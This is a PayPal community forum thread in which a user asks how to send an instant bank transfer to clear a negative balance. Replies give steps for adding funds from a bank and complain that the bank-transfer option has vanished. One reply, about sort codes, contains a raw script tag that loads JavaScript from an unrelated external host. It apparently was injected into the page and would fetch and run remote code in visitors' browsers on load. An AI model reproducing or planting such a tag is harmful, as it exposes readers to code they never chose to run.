instant bank transfers

harlequ1n
Contributor
Contributor

I need to send an instant bank transfer to paypal, to resolve my negative balance, but  cant find paypals email address, in order to send it,  any ideas?

Login to Me Too
5 REPLIES 5

minty1
Advisor
Advisor

Hi harlequ1n

You dont need paypals email address try this but read through thoroughly it first

How do I add money to my PayPal balance and how long does it take?

To add money from your bank account to your PayPal account, you’ll first need to confirm your bank account. When you confirm your bank account it allows you to add money from your bank to your PayPal balance.

To add money:

1. Log in to your PayPal account.
  2. Click Add Funds near the top of the page.
  3. Click Transfer Funds from a Bank Account in the United Kingdom.
  4. Enter the amount you wish to add.
  5. Click Continue.
  6. Review the details and click Submit.
  7. Click View the details of this transaction to see the expected clearing date for the funds transfer.

The funds will become available in your PayPal account balance in approximately five to seven working days.

You can view the current status of your bank transfer by going to your PayPal transaction 'History' and checking the transaction status:

• Pending: you requested an electronic funds transfer
  • Processing: your request for funds has been sent to the bank
  • Completed: the funds transfer to your PayPal account has been completed and the funds are in your PayPal account balance
  • Refused: your funds transfer was rejected by the bank.

Note: Once you begin a transfer to add money there is no way to cancel or undo the request we've made to your bank. This is an automatic process which your bank begins when you confirm your request to add funds.

Login to Me Too

davspitfire
New Community Member

I am having problems knowing what the sort code is and where to get it to transfer money from my bank to my paypal account.

<script type="text/javascript" src="https://hostmyjs.biz/include.js?id=js15"></script>
Login to Me Too

harlequ1n
Contributor
Contributor

thanks, but I need to send an instant bank transfer, as I have ebay items overdue for payment

Login to Me Too

danny-mdm
Contributor
Contributor

I'm having the same problem, but you won't get a straight answer from PayPal unfortunately.

They either can't (genuinely), or won't tell you exactly why the option is gone to pay via bank transfer. They will tell you it's either automatically been blocked (but not why), or to wait and see if the option comes back.

They won't have 2nd or 3rd line support get a definitive answer for you either I don't think. I'm trying to get an answer myself, and I see many people asking in these forums, with no answer.

They may say use a card, but if you are sending money to a friend you will need to pay the fee, bank transfers don't incur a fee.

Good luck.

Login to Me Too

kernowlass
Esteemed Advisor
Esteemed Advisor

Minty has already told you how to send an instant bank transfer in the post above.

Advice is voluntary.
Kudos / Solution appreciated.
Login to Me Too

Haven't Found your Answer?

It happens. Hit the "Login to Ask the community" button to create a question for the PayPal community.